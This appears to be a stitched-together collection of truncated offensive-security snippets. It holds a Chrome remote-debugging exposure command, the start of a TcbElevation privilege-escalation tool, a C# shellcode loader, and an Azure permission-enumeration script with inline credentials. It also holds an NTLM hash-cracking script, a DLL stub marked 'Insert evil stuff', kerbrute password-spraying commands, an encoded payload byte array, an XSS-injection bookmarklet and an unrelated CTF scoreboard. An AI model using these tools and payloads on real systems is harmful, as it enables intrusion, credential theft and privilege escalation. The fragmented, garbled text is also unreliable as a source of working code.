Start Chrome with the following flags:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
--remote-debugging-port=9222
--remote-debugging-address=0.0.0.0
// TcbElevation - Authors: @splinter_code and @decoder_it | |
#define SECURITY_WIN32 | |
#include <windows.h> | |
#include <sspi.h> | |
#include <stdio.h> | |
#pragma comment(lib, "Secur32.lib") | |
void EnableTcbPrivilege(BOOL enforceCheck); |
//original runner by @Arno0x: https://github.com/Arno0x/CSharpScripts/blob/master/shellcodeLauncher.cs | |
using System; | |
using System.Runtime.InteropServices; | |
using System.Reflection; | |
using System.Reflection.Emit; | |
namespace ShellcodeLoader | |
{ | |
class Program |
## Find dangerous API permissions as a user | |
$AzureTenantID = '<Your tenant ID>' | |
$AccountName = '<Username>@<Domain.com>' | |
$Password = ConvertTo-SecureString '<Your password>' -AsPlainText -Force | |
$Credential = New-Object System.Management.Automation.PSCredential($AccountName, $Password) | |
Connect-AzAccount -Credential $Credential -TenantID $AzureTenantID | |
function Get-AzureGraphToken | |
{ |
#/bin/bash | |
session=ntlmscript | |
if [ -z "$1" ]; then | |
echo "No hashfile supplied" | |
exit | |
fi | |
hashfile=$1 | |
if [ ! -f $hashfile ]; then | |
echo "[ERROR] File not exists." |
TEAM | POINTS | LAST SUBMIT | |
----------------------------------+--------+------------------- | |
<CA> HubrETS Hackin'' | 155 | 2020/05/17 14:58 | |
<CA> Les Gentils Pirates | 133 | 2020/05/17 14:42 | |
<CA> CLICKESTI | 129 | 2020/05/17 14:07 | |
<US> Skiddies as a Service | 125 | 2020/05/17 14:44 | |
<CA> cold_root | 116 | 2020/05/17 14:38 | |
<CA> Panique Au Village | 94 | 2020/05/17 14:47 | |
<CA> Shopify | 84 | 2020/05/17 14:47 | |
<CA> segfaults | 77 | 2020/05/17 14:55 |
#include <Windows.h> | |
#include <intrin.h> | |
#include <string> | |
#include <TlHelp32.h> | |
#include <psapi.h> | |
DWORD WINAPI Thread(LPVOID lpParam) { | |
// Insert evil stuff | |
ExitProcess(0); |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
$a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67, |
javascript:(function()%7Bvar j %3D document.getElementsByTagName("input")%3Bif (document.location.href.indexOf("%3F")>-1)%7Bvar l %3D "%26"%3B%7Delse%7Bvar l %3D "%3F"%3B%7Dfor (i%3D0%3Bi<j.length%3Bi%2B%2B)%7Bl%2B%3Dj%5Bi%5D.getAttribute("name")%2B'%3D"><test1234>%26'%7Ddocument.location %3D document.location%2Bl%7D)() |